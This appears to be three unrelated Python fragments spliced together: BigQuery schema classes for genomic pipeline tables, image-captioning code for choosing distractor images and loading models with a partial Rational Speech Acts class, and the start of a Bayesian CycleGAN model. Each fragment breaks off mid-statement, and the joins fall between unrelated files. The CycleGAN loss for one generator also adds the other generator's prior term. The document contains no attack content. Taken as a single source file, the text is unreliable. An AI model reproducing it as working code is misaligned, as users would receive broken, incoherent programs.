class BQGenomicSetMemberView(BQView):
__viewname__ = 'v_genomic_set_member'
__viewdescr__ = 'Genomic Set Member View'
__pk_id__ = 'id'
__table__ = BQGenomicSetMember
class BQGenomicJobRunSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
job = BQField('job', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE, fld_enum=GenomicJobEnum)
job_id = BQField('job_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE, fld_enum=GenomicJobEnum)
start_time = BQField('start_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
end_time = BQField('end_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
run_status = BQField('run_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
run_status_id = BQField('run_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
run_result = BQField('run_result', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
run_result_id = BQField('run_result_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
result_message = BQField('result_message', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
class BQGenomicJobRun(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_job_run'
__schema__ = BQGenomicJobRunSchema
class BQGenomicJobRunView(BQView):
__viewname__ = 'v_genomic_job_run'
__viewdescr__ = 'Genomic Job Run View'
__pk_id__ = 'id'
__table__ = BQGenomicJobRun
class BQGenomicFileProcessedSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# RDR fields
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
run_id = BQField('run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
start_time = BQField('start_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
end_time = BQField('end_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
file_path = BQField('file_path', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
bucket_name = BQField('bucket_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
file_name = BQField('file_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
file_status_id = BQField('file_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
file_status = BQField('file_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
file_result_id = BQField('file_result_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
file_result = BQField('file_result', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
upload_date = BQField('upload_date', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_manifest_file_id = BQField('genomic_manifest_file_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
class BQGenomicFileProcessed(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_file_processed'
__schema__ = BQGenomicFileProcessedSchema
class BQGenomicFileProcessedView(BQView):
__viewname__ = 'v_genomic_file_processed'
__viewdescr__ = 'Genomic File Processed View'
__pk_id__ = 'id'
__table__ = BQGenomicFileProcessed
class BQGenomicManifestFileSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# RDR fields
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
upload_date = BQField('upload_date', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
manifest_type_id = BQField('manifest_type_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicManifestTypesEnum)
manifest_type = BQField('manifest_type', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicManifestTypesEnum)
file_path = BQField('file_path', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
bucket_name = BQField('bucket_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
record_count = BQField('record_count', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
rdr_processing_complete = BQField('rdr_processing_complete', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
rdr_processing_complete_date = BQField('rdr_processing_complete_date', BQFieldTypeEnum.DATETIME,
BQFieldModeEnum.NULLABLE)
ignore_flag = BQField('ignore_flag', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
file_name = BQField('file_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
class BQGenomicManifestFile(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_manifest_file'
__schema__ = BQGenomicManifestFileSchema
class BQGenomicManifestFileView(BQView):
__viewname__ = 'v_genomic_manifest_file'
__viewdescr__ = 'Genomic Manifest File View'
__pk_id__ = 'id'
__table__ = BQGenomicManifestFile
__sql__ = """
SELECT gmf.*
FROM (
SELECT *,
ROW_NUMBER() OVER (PARTITION BY orig_id ORDER BY modified desc) AS rn
FROM `{project}`.{dataset}.genomic_manifest_file
) gmf
WHERE gmf.rn = 1 and gmf.ignore_flag = 0
"""
class BQGenomicManifestFeedbackSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# RDR fields
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
input_manifest_file_id = BQField('input_manifest_file_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
feedback_manifest_file_id = BQField('feedback_manifest_file_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
feedback_record_count = BQField('feedback_record_count', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
feedback_complete = BQField('feedback_complete', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
feedback_complete_date = BQField('feedback_complete_date', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
ignore_flag = BQField('ignore_flag', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
class BQGenomicManifestFeedback(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_manifest_feedback'
__schema__ = BQGenomicManifestFeedbackSchema
class BQGenomicManifestFeedbackView(BQView):
__viewname__ = 'v_genomic_manifest_feedback'
__viewdescr__ = 'Genomic Manifest Feedback View'
__pk_id__ = 'id'
__table__ = BQGenomicManifestFeedback
__sql__ = """
SELECT gmf.*
FROM (
SELECT *,
ROW_NUMBER() OVER (PARTITION BY orig_id ORDER BY modified desc) AS rn
FROM `{project}`.{dataset}.genomic_manifest_feedback
) gmf
WHERE gmf.rn = 1 and gmf.ignore_flag = 0
"""
class BQGenomicGCValidationMetricsSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
orig_created = BQField('orig_created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
orig_modified = BQField('orig_modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_member_id = BQField('genomic_set_member_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
genomic_file_processed_id = BQField('genomic_file_processed_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
lims_id = BQField('lims_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
call_rate = BQField('call_rate', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
mean_coverage = BQField('mean_coverage', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genome_coverage = BQField('genome_coverage', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
contamination = BQField('contamination', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
sex_concordance = BQField('sex_concordance', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
processing_status = BQField('processing_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
notes = BQField('notes', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
site_id = BQField('site_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
chipwellbarcode = BQField('chipwellbarcode', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
idat_green_received = BQField('idat_green_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
idat_red_received = BQField('idat_red_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
vcf_received = BQField('vcf_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
crai_received = BQField('crai_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
cram_md5_received = BQField('cram_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
cram_received = BQField('cram_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
hf_vcf_md5_received = BQField('hf_vcf_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
hf_vcf_received = BQField('hf_vcf_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
hf_vcf_tbi_received = BQField('hf_vcf_tbi_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
raw_vcf_md5_received = BQField('raw_vcf_md5_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
raw_vcf_received = BQField('raw_vcf_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
raw_vcf_tbi_received = BQField('raw_vcf_tbi_received', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
sex_ploidy = BQField('sex_ploidy', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
idat_green_md5_received = | |
self.silent:
print("after expansion we have {} distractor images".format(len(overall_distractor_ids)))
distractors_by_partition.append((qud, overall_distractor_ids, overall_similar_ids))
return distractors_by_partition
# Step 2: retrieve each image
# with a cap, exceed the cap, we shuffle the cell list, pick first k
# or we can do a strategy (in the future)
distractors_by_partition = []
for par in partitions:
# par: ('What are the chairs made off?', {'metal': [404545], 'wood': [57870]})
# get negated cells
negated_cells = []
same_cells = []
qud = par[0]
for ans, cell in par[1].items():
if img_id not in cell:
negated_cells.append((ans, cell))
else:
new_cell = [c for c in cell if c != img_id]
same_cells.append((ans, new_cell))
overall_distractor_ids = []
for ans, cell in negated_cells[:self.max_num_cells]:
selected_imgs = self.get_top_k_from_cell(cell)
overall_distractor_ids.extend(selected_imgs)
overall_similar_ids = []
for ans, cell in same_cells[:self.max_num_cells]:
selected_imgs = self.get_top_k_from_cell(cell)
overall_similar_ids.extend(selected_imgs)
assert img_id not in overall_distractor_ids
assert img_id not in overall_similar_ids
distractors_by_partition.append((qud, overall_distractor_ids, overall_similar_ids))
return distractors_by_partition
def map_img_id_to_idx(self, img_id):
# we don't need to worry about counter and wrapped
# elem = (self._index_list[self.iter_counter], self.iter_counter+1, wrapped)
return (self.image_id_to_loader_idx[img_id], 0, False)
def get_batch(self, list_img_ids, split='test'):
"""
This is used to retrieve distractor images and turn them into a batch!
:param list_img_ids: a list of image ids, integer; we turn them into a batch
:param split: this is used to get `it_max`, how many images in the split
:return:
We return something that can be handled by model automatically
{'fc_feats': tensor([[0.]]),
'att_feats': tensor([[[6.0150e+00, 4.4883e-01, 4.1887e-02, ..., 0.0000e+00,
1.0197e-01, 7.9792e+00],
[1.4278e+00, 0.0000e+00, 0.0000e+00, ..., 0.0000e+00,
3.9953e-01, 0.0000e+00],
[5.9261e-01, 0.0000e+00, 0.0000e+00, ..., 0.0000e+00,
5.5667e-01, 5.3477e-03],
...,
[2.6863e+00, 1.1994e-01, 0.0000e+00, ..., 0.0000e+00,
0.0000e+00, 0.0000e+00],
[4.2054e+00, 3.4663e+00, 0.0000e+00, ..., 0.0000e+00,
1.5952e-01, 0.0000e+00],
[3.5983e+00, 0.0000e+00, 0.0000e+00, ..., 0.0000e+00,
1.6066e-02, 4.9341e-03]]]),
'att_masks': None,
'labels': tensor([[ 0, 1, 38, 39, 1, 40, 6, 41, 42, 43, 1, 44, 0, 0, 0, 0, 0, 0],
[ 0, 1, 38, 43, 1, 45, 46, 47, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 1, 38, 39, 1, 48, 40, 43, 1, 45, 47, 44, 0, 0, 0, 0, 0, 0],
[ 0, 49, 35, 1, 38, 50, 35, 43, 1, 46, 44, 0, 0, 0, 0, 0, 0, 0],
[ 0, 1, 38, 51, 1, 44, 3, 14, 16, 17, 1, 52, 53, 0, 0, 0, 0, 0]]),
'masks': tensor([[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0.]]),
'gts': (array([[ 1, 38, 39, 1, 40, 6, 41, 42, 43, 1, 44, 0, 0, 0, 0, 0],
[ 1, 38, 43, 1, 45, 46, 47, 44, 0, 0, 0, 0, 0, 0, 0, 0],
[ 1, 38, 39, 1, 48, 40, 43, 1, 45, 47, 44, 0, 0, 0, 0, 0],
[49, 35, 1, 38, 50, 35, 43, 1, 46, 44, 0, 0, 0, 0, 0, 0],
[ 1, 38, 51, 1, 44, 3, 14, 16, 17, 1, 52, 53, 0, 0, 0, 0]],
dtype=uint32),),
'bounds': {'it_pos_now': 0, 'it_max': 5000, 'wrapped': False},
'infos': ({'ix': 1,
'id': 522418,
'file_path': 'val2014/COCO_val2014_000000522418.jpg'},)}
"""
batch = [self.dataset[self.map_img_id_to_idx(img_id)] for img_id in list_img_ids]
return self.dataset.collate_func(batch, split)
def load_model(argstring=None, split='test', batch_size=5, beam_size=5):
import opts
import argparse
import misc.utils as utils
# Input arguments and options
parser = argparse.ArgumentParser()
# Input paths
parser.add_argument('--model', type=str, default='',
help='path to model to evaluate')
parser.add_argument('--cnn_model', type=str, default='resnet101',
help='resnet101, resnet152')
parser.add_argument('--infos_path', type=str, default='',
help='path to infos to evaluate')
parser.add_argument('--only_lang_eval', type=int, default=0,
help='lang eval on saved results')
parser.add_argument('--force', type=int, default=0,
help='force to evaluate no matter if there are results available')
opts.add_eval_options(parser)
opts.add_diversity_opts(parser)
if argstring is None:
opt = parser.parse_args(
"--dump_images 0 --num_images 5000 --model ./data/bottomup/trans_nsc/model-best.pth --infos_path ./data/bottomup/trans_nsc/infos_trans_nsc-best.pkl --language_eval 1 --sample_method bs --beam_size {}".format(
beam_size).split())
else:
opt = parser.parse_args(argstring.split())
with open(opt.infos_path, 'rb') as f:
infos = utils.pickle_load(f)
# override and collect parameters
replace = ['input_fc_dir', 'input_att_dir', 'input_box_dir', 'input_label_h5', 'input_json', 'batch_size', 'id']
ignore = ['start_from']
for k in vars(infos['opt']).keys():
if k in replace:
setattr(opt, k, getattr(opt, k) or getattr(infos['opt'], k, ''))
elif k not in ignore:
if not k in vars(opt):
vars(opt).update({k: vars(infos['opt'])[k]}) # copy over options from model
vocab = infos['vocab'] # ix -> word mapping
opt.batch_size = batch_size
# Setup the model
opt.vocab = vocab
model = models.setup(opt)
del opt.vocab # why is this deleting vocab? But well, it's what they do...
model.load_state_dict(torch.load(opt.model))
model.cuda()
if split != 'train':
model.eval()
# crit = utils.LanguageModelCriterion()
loader = DataLoader(opt)
loader.reset_iterator(split)
return model, loader, opt
def load_lm_model(model_name='log_transformer_lm', split='test', batch_size=5, beam_size=1):
# TODO: note that with self-critical loss, it may or may not make sense to train LM on such loss.
import opts
import argparse
import misc.utils as utils
# Input arguments and options
parser = argparse.ArgumentParser()
# Input paths
parser.add_argument('--model', type=str, default='',
help='path to model to evaluate')
parser.add_argument('--cnn_model', type=str, default='resnet101',
help='resnet101, resnet152')
parser.add_argument('--infos_path', type=str, default='',
help='path to infos to evaluate')
parser.add_argument('--only_lang_eval', type=int, default=0,
help='lang eval on saved results')
parser.add_argument('--force', type=int, default=0,
help='force to evaluate no matter if there are results available')
opts.add_eval_options(parser)
opts.add_diversity_opts(parser)
if model_name == 'log_transformer_lm':
opt = parser.parse_args(
"--dump_images 0 --num_images 5000 --model ./log_transformer_lm/model-best.pth --infos_path ./log_transformer_lm/infos_transformer_lm.pkl --language_eval 1 --sample_method bs --beam_size {}".format(
beam_size).split())
else:
raise Exception("LM Model not trained yet")
with open(opt.infos_path, 'rb') as f:
infos = utils.pickle_load(f)
# override and collect parameters
replace = ['input_fc_dir', 'input_att_dir', 'input_box_dir', 'input_label_h5', 'input_json', 'batch_size', 'id']
ignore = ['start_from']
for k in vars(infos['opt']).keys():
if k in replace:
setattr(opt, k, getattr(opt, k) or getattr(infos['opt'], k, ''))
elif k not in ignore:
if not k in vars(opt):
vars(opt).update({k: vars(infos['opt'])[k]}) # copy over options from model
vocab = infos['vocab'] # ix -> word mapping
opt.batch_size = batch_size
# Setup the model
opt.vocab = vocab
# model = models.setup(opt)
model = TransformerLM(opt)
del opt.vocab # why is this deleting vocab? But well, it's what they do...
model.load_state_dict(torch.load(opt.model))
model.cuda()
if split != 'train':
model.eval()
# crit = utils.LanguageModelCriterion()
# loader = DataLoader(opt)
# loader.reset_iterator(split)
return model, opt
def logsumexp(inputs, dim=None, keepdim=False):
"""Numerically stable logsumexp.
Args:
inputs: A Variable with any shape.
dim: An integer.
keepdim: A boolean.
Returns:
Equivalent of log(sum(exp(inputs), dim=dim, keepdim=keepdim)).
"""
# For a 1-D array x (any array along a single dimension),
# log sum exp(x) = s + log sum exp(x - s)
# with s = max(x) being a common choice.
if dim is None:
inputs = inputs.view(-1)
dim = 0
s, _ = torch.max(inputs, dim=dim, keepdim=True)
outputs = s + (inputs - s).exp().sum(dim=dim, keepdim=True).log()
if not keepdim:
outputs = outputs.squeeze(dim)
return outputs
class RSA(object):
"""
RSA through matrix normalization
Given a literal matrix of log-prob
c1 c2 c3
i -5 -6 -20
i' -5 -9 -20
i'' -10 -11 -20
RSA has three cases:
Case 1: If a sequence (C) has high prob for i, but high also in i', i'', the prob is relatively down-weighted
Case 2: If a sequence (C) has low prob for i, but low also in i', i'', the prob is then relatively up-weighted (higher than original)
Case 3: If a seuqnce (C) has high prob for i, but low for i', i'', the prob is relatively up-weighted
(But this is hard to say due to the final row normalization)
use logsumexp() to compute normalization constant
Normalization/division in log-space is just a substraction
Column normalization means: -5 - logsumexp([-5, -5, -10])
(Add together a column)
Row normalization means: -5 - logsumexp([-5, -6, -7])
(Add together a row)
We can compute RSA through the following steps:
Step 1: add image prior: + log P(i) to the row
Step 2: Column normalize
- Pragmatic Listener L1: L1(i|c) \propto S0(c|i) P(i)
Step 3: | |
# -*- coding: utf-8 -*-
"""
@author : <NAME>
"""
import numpy as np
import torch
import os
from collections import OrderedDict
from torch.autograd import Variable
# from torch.optim import lr_scheduler
import itertools
import util.util as util
from util.image_pool import ImagePool
from . import networks
import sys
import random
from PIL import Image
import torchvision.transforms as transforms
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
class CycleGAN():
def name(self):
return 'Bayesian CycleGAN Model'
def initialize(self, opt):
self.opt = opt
self.isTrain = opt.isTrain
if torch.cuda.is_available():
print('cuda is available, we will use gpu!')
self.Tensor = torch.cuda.FloatTensor
torch.cuda.manual_seed_all(100)
else:
self.Tensor = torch.FloatTensor
torch.manual_seed(100)
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name)
# get radio for network initialization
ratio = 256 * 256 / opt.loadSize / (opt.loadSize / opt.ratio)
# load network
netG_input_nc = opt.input_nc + 1
netG_output_nc = opt.output_nc + 1
self.netG_A = networks.define_G(netG_input_nc, opt.output_nc, opt.ngf, opt.netG_A,
opt.n_downsample_global, opt.n_blocks_global, opt.norm).type(self.Tensor)
self.netG_B = networks.define_G(netG_output_nc, opt.input_nc, opt.ngf, opt.netG_B,
opt.n_downsample_global, opt.n_blocks_global, opt.norm).type(self.Tensor)
if self.isTrain:
use_sigmoid = opt.no_lsgan
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.n_layers_D, opt.norm,
use_sigmoid, opt.num_D_A).type(self.Tensor)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.n_layers_D, opt.norm,
use_sigmoid, opt.num_D_B).type(self.Tensor)
if not self.isTrain or opt.continue_train:
self.load_network(self.netG_A, 'G_A', opt.which_epoch, self.save_dir)
self.load_network(self.netG_B, 'G_B', opt.which_epoch, self.save_dir)
if self.isTrain:
self.load_network(self.netD_A, 'D_A', opt.which_epoch, self.save_dir)
self.load_network(self.netD_B, 'D_B', opt.which_epoch, self.save_dir)
# set loss functions and optimizers
if self.isTrain:
self.old_lr = opt.lr
# define loss function
self.criterionGAN = networks.GANLoss(use_lsgan=not opt.no_lsgan, tensor=self.Tensor)
self.criterionCycle = torch.nn.L1Loss()
self.criterionL1 = torch.nn.L1Loss()
# initialize optimizers
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D_A = torch.optim.Adam(self.netD_A.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D_B = torch.optim.Adam(self.netD_B.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
print('----------Network initialized!-----------')
self.print_network(self.netG_A)
self.print_network(self.netG_B)
if self.isTrain:
self.print_network(self.netD_A)
self.print_network(self.netD_B)
print('-----------------------------------------')
def set_input(self, input):
AtoB = self.opt.which_direction == 'AtoB'
self.input_A = input['A' if AtoB else 'B']
self.input_B = input['B' if AtoB else 'A']
self.image_paths = input['A_paths' if AtoB else 'B_paths']
def forward(self):
self.real_A = Variable(self.input_A).type(self.Tensor)
self.real_B = Variable(self.input_B).type(self.Tensor)
# combine input image with random noise z
self.real_B_zx = []
for i in range(0, self.opt.mc_x):
self.z_x = self.get_z_random(self.real_B[0, 1].size(), 'gauss')
self.z_x = torch.unsqueeze(self.z_x, 0)
self.z_x = torch.unsqueeze(self.z_x, 0)
real_B_zx = []
for i in range(0, self.opt.batchSize):
_real = torch.unsqueeze(self.real_B[i], 0)
_real = torch.cat([_real, self.z_x], dim=1)
real_B_zx.append(_real)
real_B_zx = torch.cat(real_B_zx)
self.real_B_zx.append(real_B_zx)
self.real_A_zy = []
for i in range(0, self.opt.mc_y):
self.z_y = self.get_z_random(self.real_A[0, 1].size(), 'gauss')
self.z_y = torch.unsqueeze(self.z_y, 0)
self.z_y = torch.unsqueeze(self.z_y, 0)
real_A_zy = []
for i in range(0, self.opt.batchSize):
_real = torch.unsqueeze(self.real_A[i], 0)
_real = torch.cat([_real, self.z_y], dim=1)
real_A_zy.append(_real)
real_A_zy = torch.cat(real_A_zy)
self.real_A_zy.append(real_A_zy)
def inference(self):
real_A = Variable(self.input_A).type(self.Tensor)
real_B = Variable(self.input_B).type(self.Tensor)
# combine input image with random noise z
real_B_zx = []
z_x = self.get_z_random(real_B[0, 1].size(), 'gauss')
z_x = torch.unsqueeze(z_x, 0)
z_x = torch.unsqueeze(z_x, 0)
for i in range(0, self.opt.batchSize):
_real = torch.cat((real_B[i:i + 1], z_x), dim=1)
real_B_zx.append(_real)
real_B_zx = torch.cat(real_B_zx)
real_A_zy = []
z_y = self.get_z_random(real_A[0, 1].size(), 'gauss')
z_y = torch.unsqueeze(z_y, 0)
z_y = torch.unsqueeze(z_y, 0)
for i in range(0, self.opt.batchSize):
_real = torch.cat((real_A[i:i + 1], z_y), dim=1)
real_A_zy.append(_real)
real_A_zy = torch.cat(real_A_zy)
# inference
fake_B = self.netG_A(real_A_zy)
fake_B_next = torch.cat((fake_B, z_x), dim=1)
self.rec_A = self.netG_B(fake_B_next).data
self.fake_B = fake_B.data
fake_A = self.netG_B(real_B_zx)
fake_A_next = torch.cat((fake_A, z_y), dim=1)
self.rec_B = self.netG_A(fake_A_next).data
self.fake_A = fake_A.data
def get_image_paths(self):
return self.image_paths
def img_resize(self, img, target_width):
ow, oh = img.size
if (ow == target_width):
return img
else:
w = target_width
h = int(target_width * oh / ow)
return img.resize((w, h), Image.BICUBIC)
def get_z_random(self, nz, random_type='gauss'):
z = self.Tensor(nz)
if random_type == 'uni':
z.copy_(torch.rand(nz) * 2.0 - 1.0)
elif random_type == 'gauss':
z.copy_(torch.randn(nz))
z = Variable(z)
return z
def backward_G(self):
# GAN loss D_A(G_A(A))
fake_B = []
for real_A in self.real_A_zy:
_fake = self.netG_A(real_A)
fake_B.append(_fake)
fake_B = torch.cat(fake_B)
pred_fake = self.netD_A(fake_B)
loss_G_A = self.criterionGAN(pred_fake, True)
# GAN loss D_B(G_B(B))
fake_A = []
for real_B in self.real_B_zx:
_fake = self.netG_B(real_B)
fake_A.append(_fake)
fake_A = torch.cat(fake_A)
pred_fake = self.netD_B(fake_A)
loss_G_B = self.criterionGAN(pred_fake, True)
# cycle loss
lambda_A = self.opt.lambda_A
lambda_B = self.opt.lambda_B
# Forward cycle loss
fake_B_next = []
for i in range(0, self.opt.mc_y):
_fake = fake_B[i * self.opt.batchSize:(i + 1) * self.opt.batchSize]
_fake = torch.cat((_fake, self.z_x), dim=1)
fake_B_next.append(_fake)
fake_B_next = torch.cat(fake_B_next)
rec_A = self.netG_B(fake_B_next)
loss_cycle_A = 0
for i in range(0, self.opt.mc_y):
loss_cycle_A += self.criterionCycle(rec_A[i * self.opt.batchSize:(i + 1) * self.opt.batchSize],
self.real_A) * lambda_A
pred_cycle_G_A = self.netD_B(rec_A)
loss_cycle_G_A = self.criterionGAN(pred_cycle_G_A, True)
# Backward cycle loss
fake_A_next = []
for i in range(0, self.opt.mc_x):
_fake = fake_A[i * self.opt.batchSize:(i + 1) * self.opt.batchSize]
_fake = torch.cat((_fake, self.z_y), dim=1)
fake_A_next.append(_fake)
fake_A_next = torch.cat(fake_A_next)
rec_B = self.netG_A(fake_A_next)
loss_cycle_B = 0
for i in range(0, self.opt.mc_x):
loss_cycle_B += self.criterionCycle(rec_B[i * self.opt.batchSize:(i + 1) * self.opt.batchSize],
self.real_B) * lambda_B
pred_cycle_G_B = self.netD_A(rec_B)
loss_cycle_G_B = self.criterionGAN(pred_cycle_G_B, True)
# prior loss
prior_loss_G_A = self.get_prior(self.netG_A.parameters(), self.opt.batchSize)
prior_loss_G_B = self.get_prior(self.netG_B.parameters(), self.opt.batchSize)
# total loss
loss_G = loss_G_A + loss_G_B + (prior_loss_G_A + prior_loss_G_B) + (loss_cycle_G_A + loss_cycle_G_B) * self.opt.gamma + (loss_cycle_A + loss_cycle_B)
loss_G.backward()
self.fake_B = fake_B.data
self.fake_A = fake_A.data
self.rec_A = rec_A.data
self.rec_B = rec_B.data
self.loss_G_A = loss_G_A.data[0] + loss_cycle_G_A.data[0] * self.opt.gamma + prior_loss_G_A.data[0]
self.loss_G_B = loss_G_B.data[0] + loss_cycle_G_B.data[0] * self.opt.gamma + prior_loss_G_A.data[0]
self.loss_cycle_A = loss_cycle_A.data[0]
self.loss_cycle_B = loss_cycle_B.data[0]
def backward_D_A(self):
fake_B = Variable(self.fake_B).type(self.Tensor)
rec_B = Variable(self.rec_B).type(self.Tensor)
# how well it classifiers fake images
pred_fake = self.netD_A(fake_B.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
pred_cycle_fake = self.netD_A(rec_B.detach())
loss_D_cycle_fake = self.criterionGAN(pred_cycle_fake, False)
# how well it classifiers real images
pred_real = self.netD_A(self.real_B)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_y
# prior loss
